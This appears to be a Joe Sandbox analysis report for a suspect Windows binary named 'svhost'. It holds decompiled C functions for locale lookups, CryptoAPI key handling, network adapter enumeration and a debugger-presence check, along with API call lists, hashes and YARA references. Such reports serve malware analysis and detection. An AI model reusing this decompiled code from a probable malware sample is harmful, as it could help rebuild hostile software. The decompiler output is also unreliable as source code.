                                      • GetLocaleInfoW.KERNEL32(?,2000000B,00EB9A54,00000002,00000000,?,?,?,00EB9A54,?,00000000), ref: 00EB97CF
                                      • GetLocaleInfoW.KERNEL32(?,20001004,00EB9A54,00000002,00000000,?,?,?,00EB9A54,?,00000000), ref: 00EB97F8
                                      • GetACP.KERNEL32(?,?,00EB9A54,?,00000000), ref: 00EB980D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InfoLocale
                                      • String ID: ACP$OCP
                                      • API String ID: 2299586839-711371036
                                      • Opcode ID: f8f656bf6f8e29845e4dec62ac8a85a86c1fa4b3bb7dc142d95cfe99886f99da
                                      • Instruction ID: ddf6c56d89da98edb4886c4758a1b22fdf7c2ad490e71714dee885afe793aa6e
                                      • Opcode Fuzzy Hash: f8f656bf6f8e29845e4dec62ac8a85a86c1fa4b3bb7dc142d95cfe99886f99da
                                      • Instruction Fuzzy Hash: 0321F132A10110AADB348F65C901FD772E6AF54B58B1A9036EB0AF7212EB32DE41C350
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E65CB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43encryptionCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 16%
                                      			E00E65CB0(intOrPtr __ecx) {
				char _v5;
				intOrPtr _v12;
				intOrPtr _t9;
				long _t11;

				_v12 = __ecx;
				_t9 = _v12;
				if( *((intOrPtr*)(_t9 + 0xc)) == 0) {
					__imp__CryptAcquireContextW(_v12 + 0xc, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0xf0000000);
					if(_t9 != 0) {
						return 1;
					}
					_t11 = GetLastError();
					if(_t11 != 0x80090016) {
						return 0;
					}
					__imp__CryptAcquireContextW(_v12 + 0xc, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
					if(_t11 == 0) {
						_v5 = 0;
					} else {
						_v5 = 1;
					}
					return _v5;
				}
				return 1;
			}







                                      0x00e65cb6
                                      0x00e65cb9
                                      0x00e65cc0
                                      0x00e65cdb
                                      0x00e65ce3
                                      0x00000000
                                      0x00e65d21
                                      0x00e65ce5
                                      0x00e65cf0
                                      0x00000000
                                      0x00e65d1d
                                      0x00e65d04
                                      0x00e65d0c
                                      0x00e65d14
                                      0x00e65d0e
                                      0x00e65d0e
                                      0x00e65d0e
                                      0x00000000
                                      0x00e65d18
                                      0x00000000

                                      APIs
                                      • CryptAcquireContextW.ADVAPI32(00E55DD0,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,00E55DDC,00000000,?,{8761ABBD-7F85-42EE-B272-A76179687C63}), ref: 00E65CDB
                                      • GetLastError.KERNEL32(?,{8761ABBD-7F85-42EE-B272-A76179687C63}), ref: 00E65CE5
                                      • CryptAcquireContextW.ADVAPI32(-0000000B,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,{8761ABBD-7F85-42EE-B272-A76179687C63}), ref: 00E65D04
                                      Strings
                                      • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00E65CCD
                                      • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00E65CF6
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AcquireContextCrypt$ErrorLast
                                      • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                      • API String ID: 2779411412-947817771
                                      • Opcode ID: d65fbc96e077675ba8befdea90929f9bfb5f788231a1d094bcae6230726695e3
                                      • Instruction ID: 380e5d5e044bbfc2b2fdf434d004993301571b4c216499e779b3b2aed04589e3
                                      • Opcode Fuzzy Hash: d65fbc96e077675ba8befdea90929f9bfb5f788231a1d094bcae6230726695e3
                                      • Instruction Fuzzy Hash: 6301F931BC874CBBDB109B95AC4DFEF7B749B01749F156498E6007B2C1C2B684499B51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00EB990B Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                      Download Yara Rule
                                      C-Code - Quality: 92%
                                      			E00EB990B(void* __ecx, void* __edx, void* __eflags, signed short _a4, short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed short* _v24;
				short* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t39;
				void* _t45;
				signed short* _t46;
				signed short _t47;
				short* _t48;
				int _t49;
				short* _t55;
				short* _t56;
				short* _t57;
				int _t65;
				int _t67;
				short* _t71;
				intOrPtr _t74;
				void* _t76;
				short* _t77;
				intOrPtr _t84;
				short* _t87;
				short* _t90;
				short** _t100;
				short* _t101;
				signed short _t102;
				signed int _t105;
				void* _t106;

				_t39 =  *0xeef074; // 0x221cac15
				_v8 = _t39 ^ _t105;
				_t87 = _a12;
				_t102 = _a4;
				_v28 = _a8;
				_v24 = E00EB0EFC(__ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E00EB0EFC(__ecx, __edx);
				_t98 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t90 = _t102 + 0x80;
				_t46 = _v24;
				 *_t46 = _t102;
				_t100 =  &(_t46[2]);
				 *_t100 = _t90;
				if(_t90 != 0 &&  *_t90 != 0) {
					_t84 =  *0xecc374; // 0x17
					E00EB98AA(_t90, 0, 0xecc260, _t84 - 1, _t100);
					_t46 = _v24;
					_t106 = _t106 + 0xc;
					_t98 = 0;
				}
				_v20 = _t98;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t98) {
					_t48 =  *_t100;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t98;
					if(__eflags == 0) {
						goto L19;
					}
					E00EB924C(_t90, _t98, __eflags,  &_v20);
					_pop(_t90);
					goto L20;
				} else {
					_t71 =  *_t100;
					if(_t71 == 0) {
						L8:
						E00EB9332(_t90, _t98, __eflags,  &_v20);
						L9:
						_pop(_t90);
						if(_v20 != 0) {
							_t101 = 0;
							__eflags = 0;
							L25:
							asm("sbb esi, esi");
							_t102 = E00EB9736(_t90,  ~_t102 & _t102 + 0x00000100,  &_v20);
							__eflags = _t102;
							if(_t102 == 0) {
								L22:
								L23:
								return E00E89A35(_t87, _v8 ^ _t105, _t98, _t101, _t102);
							}
							_t55 = IsValidCodePage(_t102 & 0x0000ffff);
							__eflags = _t55;
							if(_t55 == 0) {
								goto L22;
							}
							_t56 = IsValidLocale(_v16, 1);
							__eflags = _t56;
							if(_t56 == 0) {
								goto L22;
							}
							_t57 = _v28;
							__eflags = _t57;
							if(_t57 != 0) {
								 *_t57 = _t102;
							}
							E00EB1857(_v16,  &(_v24[0x128]), 0x55, _t101);
							__eflags = _t87;
							if(_t87 == 0) {
								L34:
								goto L23;
							}
							_t33 =  &(_t87[0x90]); // 0xd0
							E00EB1857(_v16, _t33, 0x55, _t101);
							_t65 = GetLocaleInfoW(_v16, 0x1001, _t87, 0x40);
							__eflags = _t65;
							if(_t65 == 0) {
								goto L22;
							}
							_t36 =  &(_t87[0x40]); // 0x30
							_t67 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
							__eflags = _t67;
							if(_t67 == 0) {
								goto L22;
							}
							_t38 =  &(_t87[0x80]); // 0xb0
							E00EBDEDC(_t38, _t102, _t38, 0x10, 0xa);
							goto L34;
						}
						_t74 =  *0xecc25c; // 0x41
						_t76 = E00EB98AA(_t90, _t98, 0xecbf50, _t74 - 1, _v24);
						_t106 = _t106 + 0xc;
						if(_t76 == 0) {
							L20:
							_t101 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								goto L25;
							}
							goto L22;
						}
						_t77 =  *_t100;
						_t101 = 0;
						if(_t77 == 0) {
							L14:
							E00EB9332(_t90, _t98, __eflags,  &_v20);
							L15:
							_pop(_t90);
							goto L21;
						}
						_t119 =  *_t77;
						if( *_t77 == 0) {
							goto L14;
						}
						E00EB9297(_t90, _t98, _t119,  &_v20);
						goto L15;
					}
					_t115 =  *_t71 - _t98;
					if( *_t71 == _t98) {
						goto L8;
					}
					E00EB9297(_t90, _t98, _t115,  &_v20);
					goto L9;
				}
			}



































                                      0x00eb9913
                                      0x00eb991a
                                      0x00eb9921
                                      0x00eb9925
                                      0x00eb9929
                                      0x00eb9937
                                      0x00eb993c
                                      0x00eb993d
                                      0x00eb993e
                                      0x00eb993f
                                      0x00eb9947
                                      0x00eb9949
                                      0x00eb994f
                                      0x00eb9955
                                      0x00eb9958
                                      0x00eb995a
                                      0x00eb995d
                                      0x00eb9961
                                      0x00eb9968
                                      0x00eb9975
                                      0x00eb997a
                                      0x00eb997d
                                      0x00eb9980
                                      0x00eb9980
                                      0x00eb9982
                                      0x00eb9985
                                      0x00eb9989
                                      0x00eb99f9
                                      0x00eb99fb
                                      0x00eb99fd
                                      0x00eb9a10
                                      0x00eb9a10
                                      0x00eb9a17
                                      0x00eb9a1d
                                      0x00eb9a20
                                      0x00000000
                                      0x00eb9a20
                                      0x00eb99ff
                                      0x00eb9a02
                                      0x00000000
                                      0x00000000
                                      0x00eb9a08
                                      0x00eb9a0d
                                      0x00000000
                                      0x00eb9990
                                      0x00eb9990
                                      0x00eb9994
                                      0x00eb99a6
                                      0x00eb99aa
                                      0x00eb99af
                                      0x00eb99b3
                                      0x00eb99b4
                                      0x00eb9a3c
                                      0x00eb9a3c
                                      0x00eb9a3e
                                      0x00eb9a4a
                                      0x00eb9a54
                                      0x00eb9a58
                                      0x00eb9a5a
                                      0x00eb9a2b
                                      0x00eb9a2d
                                      0x00eb9a3b
                                      0x00eb9a3b
                                      0x00eb9a60
                                      0x00eb9a66
                                      0x00eb9a68
                                      0x00000000
                                      0x00000000
                                      0x00eb9a6f
                                      0x00eb9a75
                                      0x00eb9a77
                                      0x00000000
                                      0x00000000
                                      0x00eb9a79
                                      0x00eb9a7c
                                      0x00eb9a7e
                                      0x00eb9a80
                                      0x00eb9a80
                                      0x00eb9a91
                                      0x00eb9a96
                                      0x00eb9a98
                                      0x00eb9af8
                                      0x00000000
                                      0x00eb9afa
                                      0x00eb9a9d
                                      0x00eb9aa7
                                      0x00eb9ab7
                                      0x00eb9abd
                                      0x00eb9abf
                                      0x00000000
                                      0x00000000
                                      0x00eb9ac7
                                      0x00eb9ad6
                                      0x00eb9adc
                                      0x00eb9ade
                                      0x00000000
                                      0x00000000
                                      0x00eb9ae8
                                      0x00eb9af0
                                      0x00000000
                                      0x00eb9af5
                                      0x00eb99ba
                                      0x00eb99c9
                                      0x00eb99ce
                                      0x00eb99d3
                                      0x00eb9a23
                                      0x00eb9a23
                                      0x00eb9a23
                                      0x00eb9a25
                                      0x00eb9a29
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00eb9a29
                                      0x00eb99d5
                                      0x00eb99d7
                                      0x00eb99db
                                      0x00eb99ed
                                      0x00eb99f1
                                      0x00eb99f6
                                      0x00eb99f6
                                      0x00000000
                                      0x00eb99f6
                                      0x00eb99dd
                                      0x00eb99e0
                                      0x00000000
                                      0x00000000
                                      0x00eb99e6
                                      0x00000000
                                      0x00eb99e6
                                      0x00eb9996
                                      0x00eb9999
                                      0x00000000
                                      0x00000000
                                      0x00eb999f
                                      0x00000000
                                      0x00eb999f

                                      APIs
                                        • Part of subcall function 00EB0EFC: GetLastError.KERNEL32(00000008,00E62ABC,00000000,00EB2C01,00E76827,00E7686D,?,00E76684,00000000,00000000), ref: 00EB0F01
                                        • Part of subcall function 00EB0EFC: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00E76684,00000000,00000000), ref: 00EB0F9F
                                        • Part of subcall function 00EB0EFC: _free.LIBCMT ref: 00EB0F5E
                                        • Part of subcall function 00EB0EFC: _free.LIBCMT ref: 00EB0F94
                                      • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00EB9A17
                                      • IsValidCodePage.KERNEL32(00000000), ref: 00EB9A60
                                      • IsValidLocale.KERNEL32(?,00000001), ref: 00EB9A6F
                                      • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00EB9AB7
                                      • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00EB9AD6
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                      • String ID:
                                      • API String ID: 949163717-0
                                      • Opcode ID: 925af7ff6c3dfea20d90850ab49190413cb6cb23b772587267281de4b94fe4f6
                                      • Instruction ID: e78d39de3a0cbf4eda10b5cb3a3d66ff2f78a117a55b74e38f9c880a8398b9a3
                                      • Opcode Fuzzy Hash: 925af7ff6c3dfea20d90850ab49190413cb6cb23b772587267281de4b94fe4f6
                                      • Instruction Fuzzy Hash: 97519F71A00209AFDB10EFA5DC41BEFB3B8FF49700F145569E604FB192E7719A458B61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E6D910 Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 73%
                                      			E00E6D910(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v16;
				signed int _v20;
				char _v21;
				char _v36;
				char _v60;
				char _v64;
				signed int _v68;
				signed int _v72;
				char _v73;
				intOrPtr _v80;
				char _v104;
				signed int _t50;
				signed int _t51;
				signed int _t56;
				signed int _t57;
				void* _t70;
				signed char _t71;
				void* _t85;
				void* _t117;
				void* _t118;
				signed int _t119;
				void* _t120;
				void* _t122;

				_t118 = __esi;
				_t117 = __edi;
				_t113 = __edx;
				_t85 = __ebx;
				_push(0xffffffff);
				_push(0xec0d90);
				_push( *[fs:0x0]);
				_t50 =  *0xeef074; // 0x221cac15
				_t51 = _t50 ^ _t119;
				_v20 = _t51;
				_push(_t51);
				 *[fs:0x0] =  &_v16;
				_v80 = __ecx;
				E00E515C0( &_v36, 0xc);
				E00E566A0( &_v36);
				_v73 = 0;
				_v64 = 0x288;
				_push(0x288);
				_t56 = E00EA49B4();
				_t122 = _t120 - 0x58 + 4;
				_v68 = _t56;
				if(_v68 != 0) {
					_t57 = _v68;
					__imp__GetAdaptersInfo(_t57,  &_v64);
					__eflags = _t57 - 0x6f;
					if(_t57 != 0x6f) {
						L5:
						_t113 = _v68;
						__imp__GetAdaptersInfo(_v68,  &_v64);
						__eflags = _t57;
						if(_t57 == 0) {
							_v72 = _v68;
							while(1) {
								__eflags = _v72;
								if(__eflags == 0) {
									goto L11;
								}
								E00E58000(_t85,  &_v104, _t117, _t118, __eflags, _v72 + 0x1b0);
								E00E6DAC0(_t85,  &_v21,  &_v104, _t117, _t118, __eflags,  &_v60,  &_v104);
								E00E57F50( &_v104);
								_t70 = E00E51650( &_v60);
								_t122 = _t122 + 4;
								_t71 = E00E6DB40(_t85, _v80, _t117, _t118, _t70, 0x3e8);
								__eflags = _t71 & 0x000000ff;
								if((_t71 & 0x000000ff) != 0) {
									E00E6D830(_t85,  &_v36, _t117, _t118,  &_v60);
								}
								_t113 =  *_v72;
								_v72 =  *_v72;
								E00E57B40( &_v60);
							}
						}
						L11:
						E00EA478C(_v68);
						E00E57460(_a4, E00E51650( &_v36));
						E00E578B0( &_v36);
					} else {
						E00EA478C(_v68);
						_t113 = _v64;
						_push(_v64);
						_t57 = E00EA49B4();
						_t122 = _t122 + 8;
						_v68 = _t57;
						__eflags = _v68;
						if(_v68 != 0) {
							goto L5;
						} else {
							E00E57460(_a4, E00E51650( &_v36));
							E00E578B0( &_v36);
						}
					}
				} else {
					E00E57460(_a4, E00E51650( &_v36));
					E00E578B0( &_v36);
				}
				 *[fs:0x0] = _v16;
				return E00E89A35(_t85, _v20 ^ _t119, _t113, _t117, _t118);
			}


























                                      0x00e6d910
                                      0x00e6d910
                                      0x00e6d910
                                      0x00e6d910
                                      0x00e6d913
                                      0x00e6d915
                                      0x00e6d920
                                      0x00e6d924
                                      0x00e6d929
                                      0x00e6d92b
                                      0x00e6d92e
                                      0x00e6d932
                                      0x00e6d938
                                      0x00e6d940
                                      0x00e6d948
                                      0x00e6d94f
                                      0x00e6d952
                                      0x00e6d959
                                      0x00e6d95e
                                      0x00e6d963
                                      0x00e6d966
                                      0x00e6d96d
                                      0x00e6d998
                                      0x00e6d99c
                                      0x00e6d9a2
                                      0x00e6d9a5
                                      0x00e6d9ed
                                      0x00e6d9f1
                                      0x00e6d9f5
                                      0x00e6d9fb
                                      0x00e6d9fd
                                      0x00e6da02
                                      0x00e6da05
                                      0x00e6da05
                                      0x00e6da09
                                      0x00000000
                                      0x00000000
                                      0x00e6da18
                                      0x00e6da28
                                      0x00e6da30
                                      0x00e6da3e
                                      0x00e6da43
                                      0x00e6da4a
                                      0x00e6da52
                                      0x00e6da54
                                      0x00e6da5d
                                      0x00e6da5d
                                      0x00e6da65
                                      0x00e6da67
                                      0x00e6da6d
                                      0x00e6da6d
                                      0x00e6da05
                                      0x00e6da74
                                      0x00e6da78
                                      0x00e6da90
                                      0x00e6da98
                                      0x00e6d9a7
                                      0x00e6d9ab
                                      0x00e6d9b3
                                      0x00e6d9b6
                                      0x00e6d9b7
                                      0x00e6d9bc
                                      0x00e6d9bf
                                      0x00e6d9c2
                                      0x00e6d9c6
                                      0x00000000
                                      0x00e6d9c8
                                      0x00e6d9d8
                                      0x00e6d9e0
                                      0x00e6d9e5
                                      0x00e6d9c6
                                      0x00e6d96f
                                      0x00e6d97f
                                      0x00e6d987
                                      0x00e6d98c
                                      0x00e6daa3
                                      0x00e6dab8

                                      APIs
                                      • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 00E6D99C
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AdaptersInfo
                                      • String ID:
                                      • API String ID: 3177971545-0
                                      • Opcode ID: b7990e7351a91c8ce3017f244a5c4578e9bc00abb928aef667b914dc96abd7f4
                                      • Instruction ID: 7a9e453ee23acbc9b69c7147de1d3526b02873dea401825359885f6e92b79f4a
                                      • Opcode Fuzzy Hash: b7990e7351a91c8ce3017f244a5c4578e9bc00abb928aef667b914dc96abd7f4
                                      • Instruction Fuzzy Hash: 4A5150B1D08118DBCB04EFA0EC51EEEB7B8BF58344F445529F906B7291EB74AA09CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00EA47A7 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                      Download Yara Rule
                                      C-Code - Quality: 80%
                                      			E00EA47A7(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				void* _t69;
				intOrPtr _t70;
				signed int _t72;
				signed int _t74;

				_t70 = __esi;
				_t66 = __edx;
				_t61 = __ebx;
				_t72 = _t74;
				_t40 =  *0xeef074; // 0x221cac15
				_t41 = _t40 ^ _t72;
				_v8 = _t40 ^ _t72;
				_push(_t67);
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00E8A86B(_t41);
					_pop(_t62);
				}
				E00EA1270(_t67,  &_v804, 0, 0x50);
				E00EA1270(_t67,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t70;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E00E8A86B(_t57);
				}
				_pop(_t69);
				return E00E89A35(_t61, _v8 ^ _t72, _t66, _t69, _t70);
			}







































                                      0x00ea47a7
                                      0x00ea47a7
                                      0x00ea47a7
                                      0x00ea47aa
                                      0x00ea47b2
                                      0x00ea47b7
                                      0x00ea47b9
                                      0x00ea47c0
                                      0x00ea47c1
                                      0x00ea47c3
                                      0x00ea47c6
                                      0x00ea47cb
                                      0x00ea47cb
                                      0x00ea47d7
                                      0x00ea47ea
                                      0x00ea47f8
                                      0x00ea47fe
                                      0x00ea4804
                                      0x00ea480a
                                      0x00ea4810
                                      0x00ea4816
                                      0x00ea481c
                                      0x00ea4822
                                      0x00ea4828
                                      0x00ea482e
                                      0x00ea4835
                                      0x00ea483c
                                      0x00ea4843
                                      0x00ea484a
                                      0x00ea4851
                                      0x00ea4858
                                      0x00ea4859
                                      0x00ea4862
                                      0x00ea4868
                                      0x00ea486b
                                      0x00ea4871
                                      0x00ea487e
                                      0x00ea4887
                                      0x00ea4890
                                      0x00ea4899
                                      0x00ea48a7
                                      0x00ea48a9
                                      0x00ea48be
                                      0x00ea48ca
                                      0x00ea48cd
                                      0x00ea48d2
                                      0x00ea48d8
                                      0x00ea48df

                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 00EA489F
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00EA48A9
                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00EA48B6
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                      • String ID:
                                      • API String ID: 3906539128-0
                                      • Opcode ID: 951c71b35b6e3876c96674d84560c0e6faee1b2d6190b8e9e7b84f6eb4cd9556
                                      • Instruction ID: 7511af37e522522542347a9ee4ce6fa9ece3f7206605967d6c4228cc40d00992
                                      • Opcode Fuzzy Hash: 951c71b35b6e3876c96674d84560c0e6faee1b2d6190b8e9e7b84f6eb4cd9556
                                      • Instruction Fuzzy Hash: 5B31F4B49013189BCB21EF65D889B8DBBF8BF08310F1051EAE41CA72A1E7709B858F44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E655A0 Relevance: 4.5, APIs: 3, Instructions: 48encryptionCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 93%
                                      			E00E655A0(intOrPtr __ecx) {
				intOrPtr _v8;
				intOrPtr _t30;

				_push(__ecx);
				_v8 = __ecx;
				if( *(_v8 + 0x10) != 0) {
					E00E660D0(_v8,  *(_v8 + 0x10));
					 *(_v8 + 0x10) = 0;
				}
				if( *(_v8 + 4) != 0) {
					CryptDestroyKey( *(_v8 + 4));
					 *(_v8 + 4) = 0;
				}
				if( *(_v8 + 0xc) != 0) {
					CryptReleaseContext( *(_v8 + 0xc), 0);
					 *(_v8 + 0xc) = 0;
				}
				_t30 = _v8;
				if( *(_t30 + 8) != 0) {
					CryptReleaseContext( *(_v8 + 8), 0);
					_t30 = _v8;
					 *(_t30 + 8) = 0;
				}
				 *((char*)(_v8 + 1)) = 0;
				return _t30;
			}





                                      0x00e655a3
                                      0x00e655a4
                                      0x00e655ae
                                      0x00e655ba
                                      0x00e655c2
                                      0x00e655c2
                                      0x00e655d0
                                      0x00e655d9
                                      0x00e655e2
                                      0x00e655e2
                                      0x00e655f0
                                      0x00e655fb
                                      0x00e65604
                                      0x00e65604
                                      0x00e6560b
                                      0x00e65612
                                      0x00e6561d
                                      0x00e65623
                                      0x00e65626
                                      0x00e65626
                                      0x00e65630
                                      0x00e65637

                                      APIs
                                      • CryptDestroyKey.ADVAPI32(?,00000000,?,00E65585,?,?,00E55DDC,00000000,?,{8761ABBD-7F85-42EE-B272-A76179687C63}), ref: 00E655D9
                                      • CryptReleaseContext.ADVAPI32(?,00000000,00000000,?,00E65585,?,?,00E55DDC,00000000,?,{8761ABBD-7F85-42EE-B272-A76179687C63}), ref: 00E655FB
